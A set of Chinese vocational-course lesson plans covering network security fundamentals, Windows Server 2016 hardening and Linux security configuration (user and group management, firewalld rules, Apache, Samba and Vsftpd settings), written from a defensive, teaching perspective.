版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
網絡安全基礎知識教學設計題目網絡安全基礎知識授課專業(yè)學情分析現(xiàn)如今,計算機通信網絡以及Internet已成為我們社會結構的一個基本組成部分。網絡被應用于各個方面,包括電子銀行、電子商務、現(xiàn)代化的企業(yè)管理、信息服務業(yè)等都以計算機網絡系統(tǒng)為基礎。安全性是互聯(lián)網技術中很關鍵的也很容易被忽略的問題。在網絡廣泛使用的今天,我們更應該了解網絡安全,做好防范措施,做好網絡信息的保密性、完整性和可用性。通過本節(jié)課內容學習,學生一方面可以對本課程學習的意義有更深的理解,同時對網絡安全有一個概括和全面的認知,對實際問題的解決有更多思路與方法。教學目標確保學生能夠理解網絡安全的意義,認識各種網絡安全威脅,掌握基本的網絡安全防范措施,并在實際生活中加以應用。過程與方法在教學過程中,應該注重理論與實踐相結合。通過課堂講解、案例分析和實驗操作等方式,讓學生在實踐中學習和體驗網絡安全的重要性。情感態(tài)度與價值觀培養(yǎng)學生對網絡安全的正確態(tài)度,增強他們的網絡安全意識,使他們認識到網絡安全對個人和社會的重要性。這包括遵守網絡道德,合理使用網絡資源,以及保護個人和他人的信息安全。教學重點網絡安全防范,特別是病毒、木馬的危害及傳播途徑的認識教學難點如何有效地將這些抽象的概念轉化為學生能夠理解和掌握的知識教學方法采用多樣化的教學方法,如講授、討論、合作學習、案例分析等,以適應不同學生的學習需求和偏好。同時,利用現(xiàn)代教育技術手段,如多媒體教學、網絡模擬等,提高教學效果。持續(xù)更新隨著網絡技術的發(fā)展和新的安全威脅的出現(xiàn),教學內容和方法也應該不斷更新,以保證學生能夠應對最新的網絡安全挑戰(zhàn)。教學過程教學內容課堂組織一、案例引入列舉身邊的例子,引入網絡安全:開學之際,有的班主任會在班級群里發(fā)布通知,收取學習資料采購等費用。犯罪分子利用各種方式誘導、哄騙學生與家長,獲取班級群二維碼,偽裝成學生家長進群,后添加班主任QQ、微信,“潛水”觀察班主任的活動規(guī)律,同機將自己的頭像、昵稱修改至與班主任的相同,然后在群里發(fā)布收費通知,實施詐騙。二、新課講解1.網絡安全的內涵(1)定義:網絡安全是指網絡系統(tǒng)的硬件、軟件及系統(tǒng)中的數(shù)據受到保護,不因偶然的或惡意的原因而被破壞、更改、泄露,系統(tǒng)連續(xù)、可靠、正常地運行,網絡服務不中斷。(2)特性:1.完整性2.可用性3.可靠性4.保密性5.可控性6.不可抵賴性2.網絡安全威脅(1)類型:①黑客攻擊黑客是指利用網絡技術中的一些缺陷和漏洞,對計算機系統(tǒng)進行非法入侵的人。黑客攻擊的意圖是阻礙合法網絡用戶使用相關服務或破壞正常的商務活動。②非授權訪問非授權訪問是指未經授權實體的同意獲得了該實體的服務或資源。③計算機病毒、木馬和蠕蟲計算機病毒是指制作者在計算機程序中插入的破壞計算機功能、毀壞數(shù)據、影響計算機使用并能自我復制的一組計算機命令或程序代碼。木馬是通過偽裝自身來吸引用戶下載和執(zhí)行,向施種者提供打開被種者計算機的門戶,使施種者可以任意毀壞、竊取被種者的文件,甚至遠程操控被種者的計算機。蠕蟲是一種特殊的計算機病毒,不需要將自身附著到宿主程序上,而是傳播自身功能的副本或某些部分到其他的計算機系統(tǒng)中。④拒絕服務拒絕服務(DenialofService,DoS)的主要手段是對系統(tǒng)的信息或其他資源發(fā)送大量的非法連接請求,從而導致系統(tǒng)產生過量負載,最終使合法用戶無法使用系統(tǒng)的資源。⑤內部入侵內部入侵也被稱為授權侵犯,是指被授權以某一目的使用某個系統(tǒng)或資源的個人,利用此權限進行其他非授權活動。(2)產出網絡安全威脅的原因①薄弱的認證環(huán)節(jié)網絡上的認證通常是使用口令來實現(xiàn)的,但口令具有薄弱性??诹钇谱g中最常用的兩種方法是把加密的口令解密和通過信道竊取口令。②系統(tǒng)的易被監(jiān)視性用戶使用Telnet或FTP連接遠程主機上的賬戶,在網絡上傳輸?shù)目诹钍俏醇用艿?。入侵者可以通過監(jiān)視攜帶用戶名和口令的IP包來獲取它們,然后使用這些用戶名和口令通過正常渠道登錄系統(tǒng)。③易欺騙性TCP或UDP服務相信主機的IP地址,如果使用IPSourceRouting,攻擊者的主機就可以冒充一個被信任的主機。④有缺陷的局域網服務和相互信任的主機主機的安全管理既困難又費時。為了降低管理要求并增強局域網的性能,一些站點使用了如MS、NFS的服務。這些服務通過允許一些數(shù)據庫(如口令文件)以分布式方式管理主機,以及允許系統(tǒng)共享文件和數(shù)據,在很大程度上減輕了管理的工作量。但這些服務也帶來了不安全因素,有經驗的闖入者可以利用這些服務獲取訪問權限。⑤復雜的配置和控制主機的訪問控制配置復雜且難以驗證,因此偶然的配置錯誤會使入侵者獲取訪問權限。⑥無法估計主機的安全性隨著一個站點主機數(shù)量的增加,確保每臺主機的安全性都處在高水平的能力卻在下降,使用管理一臺主機的能力來管理如此多的主機就容易犯錯誤。另外,系統(tǒng)管理的作用經常變換并行動遲緩,這導致一些系統(tǒng)的安全性比較低,這些系統(tǒng)將成為薄弱環(huán)節(jié)。思考:在現(xiàn)實生活中哪些行為會使網絡安全受到威脅?3.增強網絡安全的技術(1)信息加密技術加密是指通過計算機網絡中的加密機制,把網絡中各種原始的數(shù)字信息(明文),按照某種特定的加密算法轉換為與明文完全不同的數(shù)字信息(密文)的過程。信息加密技術是提高網絡信息的機密性、真實性,防止信息被未授權的第三方竊取或篡改所使用的技術,它還具有數(shù)字簽名、身份驗證、秘密分存、系統(tǒng)安全等功能。(2)防火墻技術防火墻是指在內部網絡和外部網絡之間實施安全防范的系統(tǒng),用于加強網絡間的訪問控制,保護內部網絡的設備不被破壞,防止內部網絡的敏感數(shù)據被竊取。防火墻的主要功能有過濾進出網絡的數(shù)據包、管理進出網絡的訪問行為、封堵某些禁止的訪問行為,以及記錄通過防火墻的信息內容和活動、對網絡攻擊進行檢測和報警等。(3)防病毒技術預防病毒、檢測病毒、清除病毒(4)入侵檢測技術入侵檢測(IDS)是對面向計算資源和網絡資源的惡意行為的識別和響應。入侵檢測系統(tǒng)是對防火墻的必要補充,它從系統(tǒng)內部和各種網絡資源中主動采集信息,從中分析可能的網絡入侵或攻擊。入侵檢測系統(tǒng)既可以及時發(fā)現(xiàn)系統(tǒng)和網絡的入侵者,也可以防止合法用戶對資源的誤操作。(5)虛擬專用網絡技術虛擬專用網絡(VPN)技術采用互聯(lián)網技術實現(xiàn)在特定范圍內加密的安全通信技術技術核心是采用隧道(Tunneling)技術將企業(yè)專用網絡中的數(shù)據加密封裝后通過虛擬的公網隧道進行傳輸,從而防止敏感數(shù)據被竊取。4.網絡安全的現(xiàn)狀與發(fā)展趨勢(1)網絡安全的現(xiàn)狀2016年11月,《中華人民共和國網絡安全法》出臺。2017年6月1日,《中華人民共和國網絡安全法》正式施行,成為我國網絡空間法治化建設的重要里程碑。2021年4月27日,通過《關鍵信息基礎施安全保護條例》。6月10日,通過《中華人民共和國數(shù)據安全法》,自9月1日起施行。7月10日,發(fā)布關于《網絡安全審查辦法(修訂草案征求意見稿)》。7月12日,發(fā)布《網絡安全產業(yè)高質量發(fā)展三年行動計劃(2021-2023年)(征求意見稿)》;同日,工業(yè)和信息化部、國家互聯(lián)網信息辦室、公安部聯(lián)合印發(fā)《網絡產品安全漏洞管理規(guī)定》,自9月1日起施行。7月20日,《2020年中國互聯(lián)網網絡安全報告》正式發(fā)布。7月30日,公布《關鍵信息基礎設施安全保護條例》,自9月1日起施行。8月20日,全國人大常委會表決通過《中華人民共和國個人信息保護法》,自11月1日起施行。2022年1月12日,國務院印發(fā)《“十四五”數(shù)字經濟發(fā)展規(guī)劃》。2月13日,征求對《工業(yè)和信息化領域數(shù)據安全管理辦法(試行)》的意見。3月2日,中央網信辦、教育部、工業(yè)和信息化部、人力資源社會保障部聯(lián)合印發(fā)《2022年提升全民數(shù)字素養(yǎng)與技能工作要點》。3月5日,2022年《政府工作報告》發(fā)布,提到了國務院將強化網絡安全、數(shù)據安全和個人信息保護。(2)網絡安全需求規(guī)模分析在“互聯(lián)網+”時代,物聯(lián)網發(fā)展迅猛,正加速滲透到生產、消費、安全防護和社會管理等領域。物聯(lián)網給我們的工作和生活帶來便利的同時,也帶來了風險。在新場景及新技術的驅動下,防護對象改變,企業(yè)網絡邊界逐漸消失,政府和企業(yè)網絡信息安全防護理念發(fā)生較大變化,逐漸從“被動安全”向“主動安全”轉變。安全產品軟件、硬件的國產化推動了產品的更新?lián)Q代,信息安全核心軟件、硬件國產化帶來自主可控的信息安全裝備平臺的巨大需求?!霸拼笪镆啤钡陌l(fā)展將使傳統(tǒng)的網絡安全產品不再能滿足客戶需求,從而迫使網絡安全產業(yè)轉變安全理念,更加重視網絡安全中的主動防御,進行革新。(3)網絡安全的發(fā)展趨勢近年來,隨著我國信息化程度的不斷提高,國內網絡安全市場規(guī)??焖僭鲩L。國內提供網絡安全產品的企業(yè)數(shù)量眾多,模式尚不統(tǒng)一,市場競爭激烈,網絡安全行業(yè)集中度較低,盡管行業(yè)格局相對分散,但行業(yè)集中度保持提高的態(tài)勢。隨著網絡信息技術的升級,針對日趨復雜的網絡環(huán)境和實際需求,網絡安全技術正朝著復雜化、多元化、個性化、智能化的方向發(fā)展,且技術迭代時間越來越短,對網絡安全企業(yè)的產品研發(fā)提出了更高的要求。網絡安全市場的份額開始向具有一定技術實力和品牌知名度的廠商匯聚,市場集中度逐步提高。三、思政課堂通過介紹網絡安全的重要性,強調網絡道德規(guī)范,如誠實、公正、尊重他人隱私等,以及遵守相關法律法規(guī)。強調個人在網絡空間的安全責任,提高學生的網絡安全防護意識,防范網絡攻擊和詐騙。提高學生的網絡素養(yǎng),培養(yǎng)其正確使用網絡的能力,包括信息檢索、分析判斷、溝通表達等。培養(yǎng)學生的社會責任感,使其在網絡空間中能夠承擔起應有的社會責任。四、課堂小結1.網絡安全的內涵(1)定義(2)特性2.網絡安全威脅3.增強網絡安全的技術4.網絡安全的現(xiàn)狀與發(fā)展趨勢五、作業(yè)布置鼓勵學生思考,自由討論,激發(fā)學生的學習欲望,引入新課內容。采用案例結合的方法,學生能更直觀的學習和理解相關定義提出問題,引導學生回答,鼓勵學生在壓力與動力并存的學習氛圍中,獨立思考,提高自主學習能力;梳理本堂課知識,強調重點和難點,提高知識總結與歸納能力Windows操作系統(tǒng)安全配置教學設計題目Windows操作系統(tǒng)安全配置授課專業(yè)學情分析學生需要理解計算機中的數(shù)據與編碼、馮·諾依曼計算機的基本結構,以及操作系統(tǒng)的類型與作用等基本概念。這些是學習Windows操作系統(tǒng)安全配置的基礎。學生應該了解不同操作系統(tǒng)的特點和區(qū)別,例如Windows服務器系統(tǒng)和Linux服務器系統(tǒng)的差異。這有助于學生更好地理解Windows操作系統(tǒng)的安全特性。通過本節(jié)課內容學習,學生一方面可以對本課程學習的意義有更深的理解,同時對Windows操作系統(tǒng)安全配置有一個概括和全面的認知,對實際問題的解決有更多思路與方法。教學目標學生應能夠熟練進行Windows操作系統(tǒng)的安全配置,如設置強密碼策略、配置用戶賬戶和權限、啟用防火墻、安裝和更新防病毒軟件、數(shù)據加密和備份等。過程與方法在教學過程中,應該注重理論與實踐相結合。通過課堂講解、案例分析和實驗操作等方式,讓學生在實踐中學習和體驗Windows操作系統(tǒng)的安全配置的重要性。情感態(tài)度與價值觀培養(yǎng)學生的安全意識,使他們能夠識別潛在的安全威脅,采取適當?shù)念A防措施,并保持對最新安全趨勢的關注。鼓勵學生發(fā)展自主學習的習慣,持續(xù)關注技術發(fā)展和安全動態(tài),以適應不斷變化的IT環(huán)境。教學重點如何進行安全配置教學難點如何制定合理的安全策略,并能夠執(zhí)行和維護這些策略教學方法采用多樣化的教學方法,如講授、討論、合作學習、案例分析等,以適應不同學生的學習需求和偏好。同時,利用現(xiàn)代教育技術手段,如多媒體教學、網絡模擬等,提高教學效果。持續(xù)更新鑒于網絡安全領域的快速發(fā)展,教學內容和方法也應該不斷更新,以確保學生能夠應對最新的網絡安全挑戰(zhàn)。教學過程教學內容課堂組織一、回顧引入通過回顧舊知識——網絡安全的概念,引入Windows操作系統(tǒng)安全配置對于計算機安全的重要性。二、新課講解1.認識Windows操作系統(tǒng)(1)定義:Windows是美國微軟公司以圖形用戶界面(GUI)為基礎研發(fā)的操作系統(tǒng),主要運用于計算機、智能手機等設備,共有普通版本、服務器版本(WindowsServer)、手機版本(WindowsPhone等)、嵌入式版本(WindowsCE等)等子系列,是全球應用最廣泛的操作系統(tǒng)之一。(2)WindowsServer2016概述WindowsServer2016是微軟公司專門為服務器提供的一款圖形化操作系統(tǒng),可以幫助信息部門的IT人員來搭建網站、應用程序服務及虛擬化云服務等。WindowsServer2016具有強大的管理功能和安全措施來簡化網站的部署與服務器的管理,能夠改善資源可用性、降低成本、保護企業(yè)應用程序和數(shù)據的安全,使運維人員更加輕松地管理服務器和維護應用程序。(3)WindowsServer2016版本1.DatacenterEdition(數(shù)據中心版)2.StandardEdition(標準版)3.EssentialsEdition(基本版)2.用戶和組的安全管理用戶是具有登錄系統(tǒng)和訪問資源權限的個人賬戶。在WindowsServer2016中,每個用戶都有一個唯一的用戶名和密碼,這些信息用于登錄系統(tǒng)。用戶可以被授權訪問特定的文件、文件夾、共享資源、應用程序、設備等。管理員可以通過設置訪問權限來對用戶進行管理。(1)用戶安全管理①修改Administrator賬戶名稱左鍵“開始”圖標,在彈出的快捷菜單中選擇“運行”命令,打開“運行”窗口,輸“gpedit.msc”,單擊“確定”按鈕。打開“本地組策略編輯器”窗口,依次選擇“計算機配置”→“Windows設置”→“安全設置”→“本地策略”→“安全選項”選項。在右側找到“賬戶:重命名系統(tǒng)管理員賬戶”選項并右擊,在彈出的快捷菜單中選擇“屬性”命令,彈出“賬戶:重命名系統(tǒng)管理員賬戶屬性”對話框。輸入新的賬戶名稱,單擊“確定”按鈕。②禁用Guest賬戶左鍵“開始”圖標,在彈出的快捷菜單中選擇“計算機管理”命令,打開“計算機管理”窗口。選擇“計算機管理(本地)”→“本地用戶和組”→“用戶”→“Guest”選項,右擊,在彈出的快捷菜單中選擇“屬性”命令。彈出“Guest屬性”對話框,勾選“賬戶已禁用”復選框。③設置用戶賬戶密碼右擊“開始”圖標,在彈出的快捷菜單中選擇“計算機管理”命令,打開“計算機管理”窗口。選擇“計算機管理(本地)”→“本地用戶和組”→“用戶”→“User”選項(以User賬戶為例),右擊,在彈出的快捷菜單中選擇“設置密碼”命令。彈出“為User設置密碼”對話框,輸入新密碼,單擊“確定”按鈕。④創(chuàng)建密碼盤在計算機上插入已經格式化的U盤,登錄賬戶之后,左鍵“開始”圖標,在彈出的快捷菜單中選擇“控制面板”命令。打開“控制面板”窗口,選擇“用戶賬戶”→“創(chuàng)建密碼重置盤”選項,打開“忘記密碼向導”窗口。單擊“下一步”按鈕,選擇密碼密鑰盤。單擊“下一步”按鈕,輸入新密碼(2)組安全管理單擊“開始”圖標→“服務器管理器”→“服務器管理器”→“儀表板”→“工具”→“計算機管理”→“本地組策略編輯器”→“本地用戶和組”→“組”→“新建組”。在儀表板選項卡中選擇“工具”→“本地安全策略”→“本地安全策略”→“本地策略”→“用戶權限分配”→“關閉系統(tǒng)”雙擊→“關閉系統(tǒng)屬性”對話框。選擇“本地安全設置”→“本地安全設置”→選擇相應的用戶或組→“添加用戶或組”,這樣被添加的組就自動擁有了該項策略的權限了。3.文件系統(tǒng)安全配置(1)設置文件權限右擊需要設置權限的文件→“屬性”→“安全”→打開“安全”選項卡。單擊“高級”按鈕→“高級安全設置”→“添加”→“選擇主體”文字鏈接→“選擇用戶或組”→輸入要選擇的對象名稱→“檢查名稱”→“確定”→彈出權限項目對話框→選擇分配給用戶的權限。(2)設置文件夾權限選中需要設置權限的文件夾并右擊→選擇“屬性”命令→打開文件夾屬性對話框→單擊“安全”→“編輯”。如果需要編輯系統(tǒng)權限,則可以單擊屬性對話框中“安全”選項卡的“高級”按鈕。(3)文件加密文件加密可以保護敏感數(shù)據,防止未經授權的用戶訪問和查看文件內容。右擊需要加密的文件或文件夾→選擇“屬性”命令→單擊“常規(guī)”選項卡→“高級”按鈕→彈出“高級屬性”對話框→勾選“加密內容以便保護數(shù)據”復選框→單擊“確定”按鈕。4.服務安全配置和加固(1)開啟系統(tǒng)自動更新功能使用Win+R組合鍵打開“運行”窗口→輸入“gpedit.msc”→“確定”→“本地組策略編輯器”→“計算機配置”→“管理模板”→“Windows組件”→“Windows更新”→“設置”→雙擊“配置自動更新”。打開“配置自動更新”窗口→“已啟用”→“選項”列表框中可以配置其他屬性→右擊“開始”→“以管理員身份運行”→打開“管理員:WindowsPowerShell”→執(zhí)行“gpupdate/force”命令,使設置生效。(2)開啟系統(tǒng)防火墻WindowsServer2016內置了一個名為Windows防火墻的功能,它可以幫助管理員保護服務器不受來自網絡的未經授權的訪問和攻擊。左鍵“開始”→“控制面板”→“系統(tǒng)和安全”→“檢查防火墻狀態(tài)”→“啟用或關閉Windows防火墻”→“自定義設置”→“專用網絡設置和公用網絡設置”→“啟用Windows防火墻”。(3)開啟IE增強安全配置啟用IE增強的安全配置后,服務器的IE瀏覽器將只能訪問白名單中的網站。單擊“開始”→“服務器管理器”→“儀表板”→“配置此本地服務器”→“IE增強的安全配置”→“啟用”→在彈出的“InternetExplorer增強的安全配置”對話框中根據需求設置管理員和用戶是否啟用InternetExplorer增強的安全配置。5.本地安全策略(1)賬戶策略配置“開始”圖標→“服務器管理器”→“儀表板”→“工具”→“計算機管理”→“本地組策略編輯器”→“本地計算機策略”→“計算機配置”→“Windows設置”→“安全設置”→“賬戶策略”→“密碼策略”→右側可以設置關于賬戶密碼的一些策略,左側“賬戶鎖定策略”選項可以設置賬戶鎖定時間等策略。6.域和活動目錄安全管理(1)域和域控制器安全策略配置①安裝ActiveDirectory服務(域控制器)“開始”圖標→“服務器管理器”→“儀表板”→“添加角色和功能”→“添加角色和功能向導”→“下一步”→“選擇安裝類型”→“基于角色或基于功能的安裝”→“下一步”→“選擇目標服務器”→“從服務器池中選擇服務器”→“下一步”→“選擇服務器角色”→勾選“ActiveDirectory域服務”→“添加角色和功能向導”→“添加功能”回到“選擇服務器角色”→“下一步”→“選擇服務器角色”→勾選“ActiveDirectory域服務”→“添加角色和功能向導”→“添加功能”回到“選擇服務器角色”→“下一步”→“選擇功能”、“ActiveDirectory域服務”使用默認選項→“確認安裝所選內容”→“安裝”→“關閉”按鈕回到“儀表板”→“通知”→“將此服務器提升為域控制器”→“ActiveDirectory域服務配置向導”→“添加新林”→“根域名”中輸入“”,→“下一步”→“域控制器選項”→鍵入目錄服務還原模式(DSRM)密碼→“下一步”→其他窗口中使用默認選項即可→“安裝”→自動重啟。②域安全策略配置“開始”圖標→“Windows管理工具”→“組策略管理”→“林:”→“域”→“”→“DefaultDomainPolicy”→“編輯”(2)活動目錄安全管理①配置密碼策略“開始”圖標→“服務器管理器”→“儀表板”→“工具”→“計算機管理”→“本地組策略編輯器”→“計算機配置”→“Windows設置”→“安全設置”→“賬戶策略”→“密碼策略”→配置密碼策略→“確定”,從而應用新的密碼策略配置。②配置賬戶鎖定策略“開始”圖標→“服務器管理器”→“儀表板”→“儀表板”→“工具”→“計算機管理”→“本地組策略編輯器”→“計算機配置”→“Windows設置”→“安全設置”→“賬戶策略”→“賬戶鎖定策略”→在窗口右側可以設置賬戶鎖定時間、嘗試次數(shù)等③定期更新和維護“開始”圖標→“控制面板”→“控制面板”→“系統(tǒng)和安全”→“更改安全和維護設置”→勾選“自動維護”?!伴_始”→“設置”→“更新和安全”→“Windows更新”→及時安裝。三、思政課堂在教學中引入國產操作系統(tǒng)的實際案例,不僅能夠貼近產業(yè)實際,還能激發(fā)學生的愛國情懷和創(chuàng)新能力。通過實踐教學,學生能夠在鞏固專業(yè)知識的同時,提高實踐能力,并增強對國產技術的認識和支持。在講授操作系統(tǒng)的核心技術時,強調我國在這一領域的發(fā)展歷程和現(xiàn)狀,讓學生認識到掌握核心技術的重要性,以及自主創(chuàng)新的迫切性。這種結合可以提升學生的責任感和使命感,鼓勵他們?yōu)閲业目萍歼M步貢獻力量。四、課堂小結1.WindowsServer2016概述2.用戶和組的安全管理3.文件系統(tǒng)安全配置4.服務安全配置和加固5.本地安全策略6.域和活動目錄安全管理五、作業(yè)布置根據本節(jié)課學的知識,嘗試自己動手進行安全配置。鼓勵學生思考,自由討論,激發(fā)學生的學習欲望,引入新課內容。采用演示法進行講解,學生能更直觀的學習和理解相關內容在教授Windows操作系統(tǒng)安全配置的過程中,應當充分挖掘和運用課程內容中所蘊含的思想政治教育資源,以培養(yǎng)學生的社會責任感和職業(yè)道德。梳理本堂課知識,強調重點和難點,提高知識總結與歸納能力提高學生動手能力,使得學生對本節(jié)課所學知識有一個更深入的了解。Linux操作系統(tǒng)安全配置教學設計題目Linux操作系統(tǒng)安全配置授課專業(yè)學情分析評估學生是否掌握了Linux系統(tǒng)的基本操作,如文件管理、權限設置、進程控制等。這些是進行更高級操作的基礎。檢查學生是否理解操作系統(tǒng)的核心概念,例如多用戶多任務環(huán)境下的進程調度、內存管理、文件系統(tǒng)以及設備驅動等。通過本節(jié)課內容學習,學生一方面可以對本課程學習的意義有更深的理解,同時對Linux操作系統(tǒng)安全配置有一個概括和全面的認知,對實際問題的解決有更多思路與方法。教學目標通過本節(jié)課的學習,學生應能夠認識Linux操作系統(tǒng),并能熟練進行Linux操作系統(tǒng)的安全配置過程與方法在教學過程中,應該注重理論與實踐相結合。通過課堂講解、案例分析和實驗操作等方式,讓學生在實踐中學習和體驗Linux操作系統(tǒng)的安全配置的重要性。情感態(tài)度與價值觀培養(yǎng)學生的安全意識,使他們能夠識別潛在的安全威脅,采取適當?shù)念A防措施,并保持對最新安全趨勢的關注。鼓勵學生發(fā)展自主學習的習慣,持續(xù)關注技術發(fā)展和安全動態(tài),以適應不斷變化的IT環(huán)境。教學重點如何在Linux操作系統(tǒng)上進行安全配置教學難點如何制定合理的安全策略,并能夠執(zhí)行和維護這些策略教學方法采用多樣化的教學方法,如講授、討論、合作學習、案例分析等,以適應不同學生的學習需求和偏好。同時,利用現(xiàn)代教育技術手段,如多媒體教學、網絡模擬等,提高教學效果。持續(xù)更新鑒于網絡安全領域的快速發(fā)展,教學內容和方法也應該不斷更新,以確保學生能夠應對最新的網絡安全挑戰(zhàn)。教學過程教學內容課堂組織一、回顧引入通過回顧舊知識——windows操作系統(tǒng)安全配置,引入Linux操作系統(tǒng)和Linux操作系統(tǒng)安全配置。二、新課講解1.認識Linux操作系統(tǒng)(1)定義:Linux是一套可以免費使用和自由傳播的開源的類UNIX操作系統(tǒng),是一款基于POSIX和UNIX的多用戶、多任務、支持多線程和多CPU的操作系統(tǒng)。(2)Linux操作系統(tǒng)的起源Linux操作系統(tǒng)的誕生、發(fā)展和成長過程有5個重要支柱:1.UNIX操作系統(tǒng)2.Minix操作系統(tǒng)3.GNU計劃4.POSIX標準5.Internet2.用戶和組的安全管理(1)了解Linux操作系統(tǒng)中的用戶①用戶標識我們在登錄Linux主機的時候,輸入的是我們的賬戶,但是其實Linux主機并不會直接認識賬戶名稱,它僅僅認識ID(一組相關數(shù)字號碼)。其實我們登錄的賬戶至少會取得兩個ID,一個是用戶ID(UserID,UID),一個是組ID(GroupID,GID)。②用戶的概念Linux操作系統(tǒng)中,用戶一般分為3種:超級用戶、普通用戶、系統(tǒng)服務用戶。超級用戶的用戶名為root,用戶ID為0,有系統(tǒng)最高的管理權。普通用戶的用戶ID默認從1000開始。系統(tǒng)服務用戶的用戶ID默認為1~499,僅供系統(tǒng)服務使用,默認設置為不可登錄。彈出“Guest屬性”對話框,勾選“賬戶已禁用”復選框。③管理用戶1)創(chuàng)建用戶命令用法:useradd[選項]<用戶名>添加用戶的示例如下:[root@localhostuser]#useradduser12)刪除用戶命令用法:userdel[選項]<用戶名>刪除用戶的示例如下:[root@localhostuser]#userdeluser13)修改用戶參數(shù)命令用法:usermod[選項]<用戶名>4)修改用戶密碼及其安全管理命令用法:passwd[選項]<用戶名>5)切換用戶Linux操作系統(tǒng)中,我們針對不同的操作常常會切換不同的身份,切換身份的原因一般有以下幾種。(1)使用一般賬戶。(2)使用較低權限啟動系統(tǒng)服務。(3)軟件本身的限制。命令用法:su<用戶名>6)sudo命令命令用法:sudo[選項]<命令>與su命令相比,使用sudo命令并不需要輸入root用戶的密碼,只需要輸入當前用戶的密碼。只有在/etc/sudoers配置文件中的用戶才能夠使用sudo命令。在默認情況下,只有root用戶才可以使用sudo命令。流程如下:(1)當執(zhí)行sudo命令時,系統(tǒng)會在/etc/sudoers文件中查找該用戶是否具有執(zhí)行sudo命令的權限。(2)如果用戶具有執(zhí)行sudo命令的權限,則讓用戶來輸入自己的密碼進行驗證。(3)如果當前用戶輸入的密碼是正確的,則sudo命令可以執(zhí)行后續(xù)命令(root用戶執(zhí)行sudo命令不需要輸入密碼)。(4)如果想要切換的用戶與當前用戶是一致的,則不需要輸入密碼。④Linux用戶身份與組記錄的文件Linux操作系統(tǒng)中,默認情況下所有的系統(tǒng)上的賬戶、一般身份用戶和root的相關信息,都記錄在/etc/passwd文件中。每個用戶的密碼則記錄在/etc/shadow文件中。此外,所有的組名都記錄在/etc/group文件中。(2)了解Linux操作系統(tǒng)中的組管理組①查看本機中組的信息命令用法:[root@localhostuser]#cat/etc/group文件內容格式如下:root:x:0:bin:x:1:sys:x:3:adm:x:4:user:x:1000:help:x:1002:該文件以“:”作為字段的分隔符,保存了本計算機中組的基本信息。②創(chuàng)建組命令用法:groupadd[選項]<組名>③刪除組命令用法:groupdel<組名>④修改組的參數(shù)命令用法:groupmod<組名>管理組成員1)將一個成員添加到組中命令用法:gpasswd-a<用戶名><組名>2)將一個成員從組中移除命令用法:gpasswd-d<用戶名><組名>3)設置組成員列表命令用法:gpasswd-M<用戶名1>[<用戶名2>,<用戶名3>,...]<組名>4)設置組管理員密碼命令用法:gpasswd<組名>5)刪除組管理員密碼命令用法:gpasswd-r<組名>6)查看用戶加入的組命令用法:groups[用戶名](3)用戶和組的安全管理①設置安全用戶在創(chuàng)建用戶時,可以使用“-s”選項指定用戶的登錄SHELL為/sbin/nologin,從而將其設置為安全用戶。②禁用root賬戶命令用法:[root@localhostuser]#vim/etc/ssh/sshd_config//打開配置文件③設置用戶密碼復雜度1)修改配置文件/etc/login.defs2)修改配置文件/etc/pam.d/system-auth3.防火墻安全配置(1)firewalld使用1)firewalld-cmd命令的使用2)開放或限制端口3)批量開放或限制端口4)禁止其他終端對服務器的ping5)允許特定的IP地址范圍可以ping6)新增規(guī)則(2)防火墻安全配置實例——防火墻綜合應用1.允許SSH連接(1)將SSH服務添加到防火墻允許的列表中。命令用法:[root@localhost~]#sudofirewall-cmd--add-service=ssh--permanent//將SSH服務添加到防火墻允許列表中,并將更改永久保存在防火墻的配置文件中(2)重新加載防火墻配置。命令用法:[root@localhost~]#sudofirewall-cmd–reload2.允許HTTP和HTTPS連接(1)將HTTP和HTTPS服務添加到防火墻允許的列表中。命令用法:[root@localhost~]#sudofirewall-cmd--add-service=http--permanent[root@localhost~]#sudofirewall-cmd--add-service=https--permanent//將HTTP和HTTPS服務添加到防火墻允許的列表中,并將更改永久保存在防火墻的配置文件中(2)重新加載防火墻配置。命令用法:[root@localhost~]#sudofirewall-cmd–reload3.阻止ICMP測試在防火墻中禁用ICMP測試。命令用法:[root@localhost~]#sudofirewall-cmd--add-rich-rule='ruleprotocolvalue="icmp"drop'--permanent//添加防火墻規(guī)則,將ICMP測試的協(xié)議設置為drop(即阻止)[root@localhost~]#sudofirewall-cmd–reload//重新加載防火墻配置4.Apache的安全配置(1)隱藏Apache敏感信息當請求一個服務器上不存在的資源時,服務器會暴露系統(tǒng)信息、服務器版本及開放的端口等信息。為了保證服務器的安全,我們一般會將這些信息隱藏。(2)為Apache使用專門的用戶和組按照最小權限原則,我們需要給Apache分配一個合適的權限,讓其能夠完成Web服務。為了使Web服務更加安全,必須保Apache使用一個專門的用戶和組,不能使用系統(tǒng)預定的賬戶。5.Samba的安全配置(1)客戶端密碼加密Samba默認為客戶端使用明文密碼。我們可以通過編輯/etc/samba/smb.conf配置文件將密碼修改為密語。(2)進行訪問控制1.IP地址訪問控制2.主機名訪問控制3.用戶或組訪問控制4.對Samba進行更新5.開啟安全審計功能6.Vsftpd的安全配置Vsftpd(非常安全的FTP守護進程)是一款運行在Linux操作系統(tǒng)上的FTP服務程序,不僅完全開源而且免費,還具有很高的安全性、傳輸速度,以及支持虛擬用戶驗證等其他FTP服務程序不具備的特點。(1)匿名開放模式在Vsftpd中,匿名開放模式是最不安全的一種認證模式。任何人都可以無須密碼驗證而直接登錄FTP服務器。這種模式一般用來訪問不重要的公開文件(在生產環(huán)境中盡量不要存放重要文件)。(2)本地用戶模式與匿名開放模式相比,本地用戶模式更安全,而且配置起來也很簡單。(3)虛擬用戶模式虛擬用戶模式是這3種模式中最安全的一種認證模式,配置流程會稍微復雜一些。創(chuàng)建用于進行FTP認證的用戶數(shù)據庫文件。②創(chuàng)建Vsftpd用于存儲文件的根目錄及可以映射到虛擬用戶的系統(tǒng)本地用戶。③建立用于支持虛擬用戶的PAM文件。④在Vsftpd的主配置文件中通過pam_service_name參數(shù)將PAM認證文件的名稱修改為vsftpd.vu。⑤為虛擬用戶設置不同的權限。⑥先設置SELinux域允許策略,然后使用虛擬用戶模式登錄FTP服務器。(4)常用安全操作1.限制鏈接數(shù)2.限制傳輸速度三、思政課堂在教授Linux服務器配置與安全防護的知識時,強調網絡空間的安全對于國家安全的重要性,培養(yǎng)學生的網絡安全防護意識和能力。鼓勵學生在學習Linux操作系統(tǒng)的過程中,進行創(chuàng)新實踐,通過動手實驗和項目開發(fā),提升解決實際問題的能力。Linux操作系統(tǒng)以其開源和高效著稱,可以在教學中強調節(jié)能減排和可持續(xù